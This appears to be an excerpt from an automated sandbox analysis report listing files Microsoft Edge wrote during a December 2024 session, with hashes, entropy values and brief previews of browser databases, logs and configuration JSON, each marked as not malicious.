                                                                                                                                                                                                                                                                                              Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):155648
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.6213202566358492
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:++esIUmufD0/hEWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kEPM1:++es8hH+bDo3iN0Z2TVJkXBBE3ybb1
                                                                                                                                                                                                                                                                                              MD5:54E0F0497BC17057DA9658F0EB9D06CA
                                                                                                                                                                                                                                                                                              SHA1:BFF842C5EA142007C2E862DECA62905AED30A6A9
                                                                                                                                                                                                                                                                                              SHA-256:55E00FFAF504D84D5630ED3422536FDB3FCC35D21882B899176375E888D86255
                                                                                                                                                                                                                                                                                              SHA-512:DE5BBE2056D16BB5C389F32074FAE0E621C5148AF7011056385F857D7EE4C285F54128F15FB1068D8CB7F1A6AE26E01794C1A248A812E96A78701209C37E2548
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):8720
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.2182474725517195
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:bl9tFlljq7A/mhWJFuQ3yy7IOWU5b9otdweytllrE9SFcTp4AGbNCV9RUI6:g75fO6td0Xi99pEYQ
                                                                                                                                                                                                                                                                                              MD5:70D0EF1451C294028386CADCD059284A
                                                                                                                                                                                                                                                                                              SHA1:B2BCCF874E9022A0B01D7D0A7CA1D91E3D8A6A3F
                                                                                                                                                                                                                                                                                              SHA-256:DE1BF02BD3E0780DD7555DB95130BCF067809420DEDBB5AB591F3BF267DCF41F
                                                                                                                                                                                                                                                                                              SHA-512:73F7BF4706E52A24A744E1542627FDFDE6328FB068434F2912A1725987871439DFE90A25C1A7E66ABDFF29AEC33EEF8024920E05AA001B7A6BAA140F02222A94
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):115717
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                              MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                              SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                              SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                              SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):49152
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.648152292571476
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:aj9P0vTQkQerkjlxP/KbtLc7gam6IThj773pLLRKToaAu:ad8Te2mlxP/NajF7NRKcC
                                                                                                                                                                                                                                                                                              MD5:AE7AC53BAA5544A786E4199B61372056
                                                                                                                                                                                                                                                                                              SHA1:53116E52A28E2675564A17635763D735EB8977C2
                                                                                                                                                                                                                                                                                              SHA-256:365E7A2B1E71E4E94D2C02E0A6F842DABB7B9163CD84F6681B477C99FEC9B9F7
                                                                                                                                                                                                                                                                                              SHA-512:D02AB18CE7D6A0BA228409AB446802998ED5B02AE76EA9DDD41A4A87C8671463AFBA68738FC0E2C36627E367E1D44EE960844825DC6593D2F4E0EBD19347B475
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):408
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.181852480621591
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:7Kxv4Yeb8rcHEZrELFUt8OKs/+OKM5LYeb8rcHEZrEZSJ:7K94Yeb8nZrExg8OK8KWLYeb8nZrEZe
                                                                                                                                                                                                                                                                                              MD5:9E3BA1598DD8E554E8B6A2D1BB374805
                                                                                                                                                                                                                                                                                              SHA1:7FBA0B9F0548049F27412F3D9BFEFB6FBF016EB1
                                                                                                                                                                                                                                                                                              SHA-256:922FBA3DC4D4287BA05841F96AB7F624CFC4700AE4BC40E0066FB1A1140985A7
                                                                                                                                                                                                                                                                                              SHA-512:6AFD100DE38D6C34E6061C011196469A49E7122E82991B731C1B91467B26F4DF323E714BF3C0A36EE87B75038EAA25BAED70ACFEB90C2D67B0E7340307EFDCEA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:23.004 1d08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/10-12:40:23.004 1d08 Recovering log #3.2024/12/10-12:40:23.004 1d08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):336
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.0861566995503615
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7L86RiOq2P923oH+Tcwt8a2jMGIFUt8OL86RwZmw+OL86RakwO923oH+Tcwt8a23:7AEv4Yeb8EFUt8OAj/+OAz5LYeb8bJ
                                                                                                                                                                                                                                                                                              MD5:DAD39F336A65E973DDFFF2D903E02921
                                                                                                                                                                                                                                                                                              SHA1:E63F69A8874B1EDC8E23E2CACF2FF778267DBAC6
                                                                                                                                                                                                                                                                                              SHA-256:3ADC449EE8A5409D6AA27D6BA39440C846765D51C8E7E2926B26D9BD1F6E11A2
                                                                                                                                                                                                                                                                                              SHA-512:AC1543BEF3D9FE5C02B6E909B6BDA0C58968FF0F9F0B91E8ED6D77B5CD1E0B1C4B397A1C2327E650FE933C9CB47D6AEEBF42DCA422189FB67BAEDDC59BFA1429
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:19.452 1e20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/10-12:40:19.454 1e20 Recovering log #3.2024/12/10-12:40:19.456 1e20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:[]
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.1370448132402866
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:TsKLopF+SawLUO1Xj8BWzRRUHgGnCCj3EVzCiAjiXN5VGL:te+AueRRgQCjLjids
                                                                                                                                                                                                                                                                                              MD5:47F34F13D0199AE8A4F80E594CB37E8F
                                                                                                                                                                                                                                                                                              SHA1:186016F9C5F6156D603CC382B93BB49C4111E24D
                                                                                                                                                                                                                                                                                              SHA-256:3A856870E7A9E543A6CF8BF78CCF007DCC1BE8260CF6DA0BB043B9D114FAEC10
                                                                                                                                                                                                                                                                                              SHA-512:3167399BE0102E290F274E18A7180A1BDACA3806CB65FBF63D812760297035D5BB57A87CAC335445606E1F9B8FB30ADF766F44920AB5B0BBA2AEEE7143C9D73B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1419
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.336110615415376
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7np+:YXs/tsbfc7leeEscgCgakhYhbx9+
                                                                                                                                                                                                                                                                                              MD5:7D870539B6C4EE40FA5CFD87A3D4BFEC
                                                                                                                                                                                                                                                                                              SHA1:F45BE07A3A05615856688219AFE6713EBABBAC2C
                                                                                                                                                                                                                                                                                              SHA-256:73513F7A38830E47624257EF04A4F73BF174FD1FEBAC172AA416BF6470930F90
                                                                                                                                                                                                                                                                                              SHA-512:90EABCE74F8CBB5FF1F96566E1293887BB3DB36C9E32F6C619D1EC7C9AAE504221CDEC2DD1468915A0A06A65E472C5446731838C89E665EBD9FA114F12261327
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1419
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.336110615415376
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7np+:YXs/tsbfc7leeEscgCgakhYhbx9+
                                                                                                                                                                                                                                                                                              MD5:7D870539B6C4EE40FA5CFD87A3D4BFEC
                                                                                                                                                                                                                                                                                              SHA1:F45BE07A3A05615856688219AFE6713EBABBAC2C
                                                                                                                                                                                                                                                                                              SHA-256:73513F7A38830E47624257EF04A4F73BF174FD1FEBAC172AA416BF6470930F90
                                                                                                                                                                                                                                                                                              SHA-512:90EABCE74F8CBB5FF1F96566E1293887BB3DB36C9E32F6C619D1EC7C9AAE504221CDEC2DD1468915A0A06A65E472C5446731838C89E665EBD9FA114F12261327
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):36864
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.7605739312418334
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:TaIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBkE1:uIEumQv8m1ccnvS6h
                                                                                                                                                                                                                                                                                              MD5:2A255C02D56CDD1F27A6BB0D7FA1F756
                                                                                                                                                                                                                                                                                              SHA1:7F9303A70C6F3AABE92CCA9F6372593A40932A6B
                                                                                                                                                                                                                                                                                              SHA-256:30F7BF9757A20F2F4560A6486B237CD79F742E48686059FB56A1F43E0C9AEF09
                                                                                                                                                                                                                                                                                              SHA-512:A4F89CB3944DA4A96B83C27DEEF24B3B28E59CD79BEC8CCCF208F30056953E9B9C43FF6CF84BB85A356375C3A901F25DE76BEB0C9CE2351CED56E71029577C82
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:[]
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:[]
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:[]
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1419
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.341603258876039
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:YcFGJ/I3RdsZ7MZVMdmRdsZcZFRudFGRRds4pZ6ma3yeesw6maPsw6C1MYhbxP7c:YcgCzsqtsufcKs4fleeBkBKYhbx9+
                                                                                                                                                                                                                                                                                              MD5:02C9983E008C9B156A5512A996389736
                                                                                                                                                                                                                                                                                              SHA1:481D02C0C1C7F5BB0AF92B2BD2B5BBBC47C01809
                                                                                                                                                                                                                                                                                              SHA-256:3C0FE2164C3E8564073C95948736F2E9914E2AA23055D653D3BF34DD7E7A8A4E
                                                                                                                                                                                                                                                                                              SHA-512:871BFB69C46BB3E4DFC8C0F08F1A01218D2A9268E39749990644F1420045A3D7636F5792E118D6BAFE13F70E0E562166C32E83BB42EBB828A7407A0C7AF0E3F2
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380918023966331","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380918026811779","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378419629489185","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymizatio
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1419
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.336110615415376
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7np+:YXs/tsbfc7leeEscgCgakhYhbx9+
                                                                                                                                                                                                                                                                                              MD5:7D870539B6C4EE40FA5CFD87A3D4BFEC
                                                                                                                                                                                                                                                                                              SHA1:F45BE07A3A05615856688219AFE6713EBABBAC2C
                                                                                                                                                                                                                                                                                              SHA-256:73513F7A38830E47624257EF04A4F73BF174FD1FEBAC172AA416BF6470930F90
                                                                                                                                                                                                                                                                                              SHA-512:90EABCE74F8CBB5FF1F96566E1293887BB3DB36C9E32F6C619D1EC7C9AAE504221CDEC2DD1468915A0A06A65E472C5446731838C89E665EBD9FA114F12261327
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.6949007314891732
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:TLSnAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3isal/d0dtdjiG1dMgrfNr:TLSOUOq0afDdWec9sJrl7ZWI7J5fc
                                                                                                                                                                                                                                                                                              MD5:52DE909D04514C10D7428B67A26BBDAC
                                                                                                                                                                                                                                                                                              SHA1:0371737559133042EBF793502ECDC403011376E4
                                                                                                                                                                                                                                                                                              SHA-256:B05BF68A882F04103FA0F53A61974AFB591B09010DDBD5139B67B9ECE073F388
                                                                                                                                                                                                                                                                                              SHA-512:A1A861BBE3D275229BD39E11A72D894D9838145876FB40D1E233D1637F26BD5C13FBCF329D7984E0F89C3D69D1177E0E852C47B2404AC4A161101EA6ED0C7DE0
                                                                                                                                                                                                                                                                                              Malicious:false
Preview:SQLite format 3......@ ...
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
